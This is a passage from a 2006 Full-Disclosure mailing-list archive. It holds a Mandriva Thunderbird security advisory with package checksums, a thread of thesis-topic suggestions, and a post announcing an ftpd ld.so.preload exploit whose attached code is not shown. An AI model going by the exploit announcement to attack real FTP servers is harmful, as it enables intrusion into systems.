2007.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 741811dd392d942b27e1b3b0de695d4e  
2007.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 7c2c4922c6a2c6ce2cb6108a95f7dbfa  
2007.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 7cbf9f3218d587ef97edf01f2298096b  
2007.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 7dbd9e4c16db82a761a7b502c1f7f22d  
2007.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 b6dd6119216f6b748ee7c1570c3b8c37  
2007.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 1eea732e08ca0ef96796c3f50abb1f77  
2007.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1cc5cf2496581d776bb43e2f0dbbea6  
2007.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
 af86ce82ff9053250f82f2215c8dd7e5  
2007.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
 6319633c561c7f68c6614685126da02b  
2007.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.i586.rpm
 56387829c6cc83882246e68e3b8704b0  
2007.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
 56cb838bb0c375f53d3cff2eb76a1118  
2007.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
 253500598ff56ab85394e68708ace21d  
2007.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
 53b4d4f1aa4e8174a33a0ed436ce961a  
2007.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
 fb9dd6933d27029538cd01a64ec55cee  
2007.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.i586.rpm
 701b9837303a3ed79e6c74c037c28926  
2007.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
 b3739c1344770e92864c50f131f08884  
2007.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
 1efe7ebc2a71e2f2d6c2785026a6e7ac  
2007.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
 6860352b37999652aab785a266673e2f  
2007.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
 51abe323b14793097935b0c221e64f71  
2007.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
 b8ec884437a460c9fbb5c71db6a46c31  
2007.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
 9ae4fb1871ee29f3f7b52210c0cf4e1b  
2007.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1a31b03ffef8e86df09579296fce3c9  
2007.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 6b4bdbb4648231b128655e56015621c7  
2007.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.i586.rpm
 d333252ee1ba51351762e4050565ecb1  

[Full-disclosure] [OOT] Thesis for master degree

2006-12-15 Thread Fajar Edisya Putera

Hello everyone, sorry for wasting your bandwidth

I'm currently trying to find an interesting topic in computer networking
security for my master degree thesis, I've read a lot of jurnal that related
with computer networking and security. All journal seem to advanced for me,
sometimes the journal has mathematical formula that I don't understand what
is the point for. Maybe someone here willing to help me? an idea? or another
journal website?

Thanks
Sincerely yours
Fajar
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDKSA-2006:206 ] - Updated Thunderbird packages fix multiple vulnerabilities

2006-12-15 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2006:206
 http://www.mandriva.com/security/
 ___
 
 Package : mozilla-thunderbird
 Date: November 9, 2006
 Affected: 2007.0, Corporate 3.0
 ___
 
 Problem Description:
 
 A number of security vulnerabilities have been discovered and corrected
 in the latest Mozilla Thunderbird program, version 1.5.0.8.

 This update provides the latest Thunderbird to correct these issues.
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748
 http://www.mozilla.org/security/announce/2006/mfsa2006-65.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-66.html
 http://www.mozilla.org/security/announce/2006/mfsa2006-67.html
 ___
 
 Updated Packages:
 
 Mandriva Linux 2007.0:
 488e65dfe45ecf7e3a9e1a3dedd5c2ce  
2007.0/i586/mozilla-thunderbird-1.5.0.8-1.1mdv2007.0.i586.rpm
 5e551ab45061148722dda1d7ce66959e  
2007.0/i586/mozilla-thunderbird-bg-1.5.0.8-1.1mdv2007.0.i586.rpm
 2149a7fd629b8bc6843c6fdf1bb49efb  
2007.0/i586/mozilla-thunderbird-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 0d2315b490e3b8dd2ab791bd6c3ee516  
2007.0/i586/mozilla-thunderbird-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 d5583d1b99b948c90e1cad62d753d67d  
2007.0/i586/mozilla-thunderbird-da-1.5.0.8-1.1mdv2007.0.i586.rpm
 00ec607c39d3de4c589997d6c7ee6679  
2007.0/i586/mozilla-thunderbird-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 6d1f0f2576362a0bb90b4f9d8c4f2153  
2007.0/i586/mozilla-thunderbird-devel-1.5.0.8-1.1mdv2007.0.i586.rpm
 2cb0e44d2e3f7fddd60249843204403f  
2007.0/i586/mozilla-thunderbird-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 0c3c771882698d5651775aeed24bfd73  
2007.0/i586/mozilla-thunderbird-enigmail-1.5.0.8-1.1mdv2007.0.i586.rpm
 477ca905391c1d555d0136d46d557869  
2007.0/i586/mozilla-thunderbird-enigmail-ca-1.5.0.8-1.1mdv2007.0.i586.rpm
 741811dd392d942b27e1b3b0de695d4e  
2007.0/i586/mozilla-thunderbird-enigmail-cs-1.5.0.8-1.1mdv2007.0.i586.rpm
 7c2c4922c6a2c6ce2cb6108a95f7dbfa  
2007.0/i586/mozilla-thunderbird-enigmail-de-1.5.0.8-1.1mdv2007.0.i586.rpm
 7cbf9f3218d587ef97edf01f2298096b  
2007.0/i586/mozilla-thunderbird-enigmail-el-1.5.0.8-1.1mdv2007.0.i586.rpm
 7dbd9e4c16db82a761a7b502c1f7f22d  
2007.0/i586/mozilla-thunderbird-enigmail-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 b6dd6119216f6b748ee7c1570c3b8c37  
2007.0/i586/mozilla-thunderbird-enigmail-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 1eea732e08ca0ef96796c3f50abb1f77  
2007.0/i586/mozilla-thunderbird-enigmail-fi-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1cc5cf2496581d776bb43e2f0dbbea6  
2007.0/i586/mozilla-thunderbird-enigmail-fr-1.5.0.8-1.1mdv2007.0.i586.rpm
 af86ce82ff9053250f82f2215c8dd7e5  
2007.0/i586/mozilla-thunderbird-enigmail-hu-1.5.0.8-1.1mdv2007.0.i586.rpm
 6319633c561c7f68c6614685126da02b  
2007.0/i586/mozilla-thunderbird-enigmail-it-1.5.0.8-1.1mdv2007.0.i586.rpm
 56387829c6cc83882246e68e3b8704b0  
2007.0/i586/mozilla-thunderbird-enigmail-ja-1.5.0.8-1.1mdv2007.0.i586.rpm
 56cb838bb0c375f53d3cff2eb76a1118  
2007.0/i586/mozilla-thunderbird-enigmail-nb-1.5.0.8-1.1mdv2007.0.i586.rpm
 253500598ff56ab85394e68708ace21d  
2007.0/i586/mozilla-thunderbird-enigmail-nl-1.5.0.8-1.1mdv2007.0.i586.rpm
 53b4d4f1aa4e8174a33a0ed436ce961a  
2007.0/i586/mozilla-thunderbird-enigmail-pl-1.5.0.8-1.1mdv2007.0.i586.rpm
 fb9dd6933d27029538cd01a64ec55cee  
2007.0/i586/mozilla-thunderbird-enigmail-pt-1.5.0.8-1.1mdv2007.0.i586.rpm
 701b9837303a3ed79e6c74c037c28926  
2007.0/i586/mozilla-thunderbird-enigmail-pt_BR-1.5.0.8-1.1mdv2007.0.i586.rpm
 b3739c1344770e92864c50f131f08884  
2007.0/i586/mozilla-thunderbird-enigmail-ru-1.5.0.8-1.1mdv2007.0.i586.rpm
 1efe7ebc2a71e2f2d6c2785026a6e7ac  
2007.0/i586/mozilla-thunderbird-enigmail-sk-1.5.0.8-1.1mdv2007.0.i586.rpm
 6860352b37999652aab785a266673e2f  
2007.0/i586/mozilla-thunderbird-enigmail-sl-1.5.0.8-1.1mdv2007.0.i586.rpm
 51abe323b14793097935b0c221e64f71  
2007.0/i586/mozilla-thunderbird-enigmail-sv-1.5.0.8-1.1mdv2007.0.i586.rpm
 b8ec884437a460c9fbb5c71db6a46c31  
2007.0/i586/mozilla-thunderbird-enigmail-zh_CN-1.5.0.8-1.1mdv2007.0.i586.rpm
 9ae4fb1871ee29f3f7b52210c0cf4e1b  
2007.0/i586/mozilla-thunderbird-es-1.5.0.8-1.1mdv2007.0.i586.rpm
 e1a31b03ffef8e86df09579296fce3c9  
2007.0/i586/mozilla-thunderbird-es_AR-1.5.0.8-1.1mdv2007.0.i586.rpm
 6b4bdbb4648231b128655e56015621c7  
2007.0/i586/mozilla-thunderbird-eu-1.5.0.8-1.1mdv2007.0.i586.rpm
 d333252ee1ba51351762e4050565ecb1  

Re: [Full-disclosure] [OOT] Thesis for master degree

2006-12-15 Thread scott hollatz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 Hello everyone, sorry for wasting your bandwidth

 I'm currently trying to find an interesting topic in computer networking
 security for my master degree thesis, I've read a lot of jurnal that related
 with computer networking and security. All journal seem to advanced for me,
 sometimes the journal has mathematical formula that I don't understand what
 is the point for. Maybe someone here willing to help me? an idea? or another
 journal website?

Networking and security *is* mathematical, don't be fooled.

A quick peek at ACM Transactions on Information and System Security
and IEEE/ACM Transactions on Networking should be a hint you need to
understand math to do a relatively decent masters thesis.

- --
scott hollatznet [EMAIL PROTECTED]
information technology systems and services  tel +1 218 726 8851
university of minnesota duluth mn usafax +1 218 726 7674
  --
   Asn aD ta zlAp em uT zt33rg
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.6 (SunOS)

iD8DBQFFgylk4og1WWfEVRsRAqoeAJsEQjvD9758OFWl3hhOcoPgMX98NgCfXHuh
ZuitIDA2auiGOhFPl9xUFfw=
=ILTE
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [OOT] Thesis for master degree

2006-12-15 Thread xyberpix
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

What about hacking ATM's, that'd make a great thesis from my side.
Also what about in-depth research into botnets?

xyberpix

On 15 Dec 2006, at 23:01, scott hollatz wrote:

 -BEGIN PGP SIGNED MESSAGE-
 Hash: SHA1

 Hello everyone, sorry for wasting your bandwidth

 I'm currently trying to find an interesting topic in computer  
 networking
 security for my master degree thesis, I've read a lot of jurnal  
 that related
 with computer networking and security. All journal seem to  
 advanced for me,
 sometimes the journal has mathematical formula that I don't  
 understand what
 is the point for. Maybe someone here willing to help me? an idea?  
 or another
 journal website?

 Networking and security *is* mathematical, don't be fooled.

 A quick peek at ACM Transactions on Information and System Security
 and IEEE/ACM Transactions on Networking should be a hint you need to
 understand math to do a relatively decent masters thesis.

 - --
 scott hollatznet  
 [EMAIL PROTECTED]
 information technology systems and services  tel +1 218 726  
 8851
 university of minnesota duluth mn usafax +1 218 726  
 7674

 --
Asn aD ta zlAp em  
 uT zt33rg
 -BEGIN PGP SIGNATURE-
 Version: GnuPG v1.4.6 (SunOS)

 iD8DBQFFgylk4og1WWfEVRsRAqoeAJsEQjvD9758OFWl3hhOcoPgMX98NgCfXHuh
 ZuitIDA2auiGOhFPl9xUFfw=
 =ILTE
 -END PGP SIGNATURE-

 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (Darwin)

iD8DBQFFgzAMt+Si58vRtJARAqpBAKCfgFJVAmrKNKqf0v0prg2YbupjfACgo1g1
hylhuBgjFPhJ0QYXoS1XMXs=
=DWHp
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] [OOT] Thesis for master degree

2006-12-15 Thread Bill Stout
Here are a few ideas:

 

- The threat of rogue Virtual machines - the inside man

- Disassembling Vista Security

- Investigating organized computer crime

- The mythical network perimeter

- Data flow analysis of confidential information within corporations

- Distribution and access of personal data

 

Just suggestions, but your thesis should be of a topic which is a
passion for you and holds your interest.  Your thesis topic may affect
your next few years of employment, so invest in something that will be
around for awhile (don't write about a technology approaching end of
life).

 

Bill Stout

 



From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Fajar
Edisya Putera
Sent: Friday, December 15, 2006 1:45 AM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] [OOT] Thesis for master degree

 

Hello everyone, sorry for wasting your bandwidth

I'm currently trying to find an interesting topic in computer networking
security for my master degree thesis, I've read a lot of jurnal that
related with computer networking and security. All journal seem to
advanced for me, sometimes the journal has mathematical formula that I
don't understand what is the point for. Maybe someone here willing to
help me? an idea? or another journal website? 

Thanks
Sincerely yours
Fajar

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ftpd ld.so.preload fun

2006-12-15 Thread kcope
Hello this is kingcope,
attached is an example exploit


-- 
Ein Herz für Kinder - Ihre Spende hilft! Aktion: www.deutschlandsegelt.de
Unser Dankeschön: Ihr Name auf dem Segel der 1. deutschen America's Cup-Yacht!


ftpd-ldpreload.pl
Description: Binary data
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/